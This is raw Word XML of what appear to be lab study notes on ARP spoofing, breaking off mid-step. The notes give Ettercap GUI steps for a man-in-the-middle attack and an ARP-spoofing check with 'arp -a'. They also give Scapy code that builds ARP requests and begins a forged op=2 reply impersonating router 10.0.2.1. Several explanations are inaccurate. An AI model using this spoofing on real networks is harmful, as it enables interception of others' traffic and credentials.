        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>magnifind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> glass: is to scan all host on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C9493" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- Host list gives: all host IPs and MAC addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C9104" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- The three dots: allows us to get a different results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D3F01E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">How To USE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF6213" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72524F10" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">2. check </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB002AF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">3. search for all host </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D63E6BE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>4. Look through host list and find your target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C97C177" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>5. select them as a Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5E626" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>6. Use the three dots for further action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BAF348" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>7. Usually will click on the MITM button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6913E2D3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- Prints out all things that are not being protected like HTTP &amp; clear text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF1B868" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>HOW TO SEE IF YOUR CONNECTION IS BEING ARP SPOOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C3C01" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -a in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FD6E47B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Multiple of the same MAC Address means that your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> is being spoofed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62080EA9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="6A274A46" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>SCAPY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00595A51" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>(MUST BE ROOT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA84B4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- like python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1DED6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- If you use the command ls(*) you can list any and all header info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE79C1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Headers such as Ether, TCP, ARP, UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91BBEC" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>TO SEND A REQUEST TO FIND TARGET MAC ADDRESSES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E352A2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>1. Make a broadcast request to target Router to find their MAC address using their Ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE5DB1A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- broadcast = Ether(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601374DF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- broadcast = type of request </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657775BD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- Ether = select that type of header  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ECAEA0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = sets a destination MAC field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF3F73C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>' = Broadcast MAC address for all routers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76607ABB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>broadcast.show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>() to show parameters of the header that we just set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E515224" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">2. Make the ARP request </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C912CF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- We have to set the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>pdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> with their IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE3600B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- It will </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>autoset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> everything else except for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hwdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> which is our hardware destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E885D3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>arp_layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = ARP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>pdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = '10.0.2.8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2862C4FF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>arp_layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = type of request </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C4034" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- ARP = type of header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA7F55D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>pdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = Target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027CCEF9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- 10.0.2.8 = targets IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091CE660" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>arp_layer.show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>() = shows us our work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BEA208" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>3. Combine our work to make it into a packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105ADD60" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>entire_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = broadcast/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>arp_layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08EB5341" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Broadcast/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>arp_layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = the combination request of the types of header </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>varibles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> I want to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E59641" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>entire_packet.show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>() = to show your work so far</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C20F31" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>4. Send off your ARP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCDCF92" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- answer = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>srp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>entire_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>, timeout=2, verbose=True)[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A10F25" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- answer = Variable for the output of the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECEE8FD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>srp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>send off</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> command //  fire packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD1724" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>entire_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = our combined ARP &amp; Ether packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD82C4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Timeout = How many seconds do you want to wait before firing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E6602" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Verbose = List all functions that went through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EC152B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- [0] = List all active </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>procces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> show </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>deactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50F50689" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>5. Read output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63088F88" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- using print(answer[0]) gives us all the active outputs// all things that ran</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A774579" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- print(answer[0][1].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hwsrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>) = Gives us target MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB11078" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">MAKING MALICOUS ARP REQUEST </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD19972" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">1. set the ARP to be in response mode </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F879B0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- using ARP(op=2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hwdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>target_mac_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>pdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = '10.0.2.8', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>psrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> ='10.0.2.1') (op=1 request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45613585" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- op=2 = Either send a ARP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>recieve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> or request packet. (In this case </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>recieve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4F0E53" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hwdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = setting as our target machine to trick the router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE56C48" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>pdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = host machine as well</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2877CFBD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>psrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> = our target router </w:t>
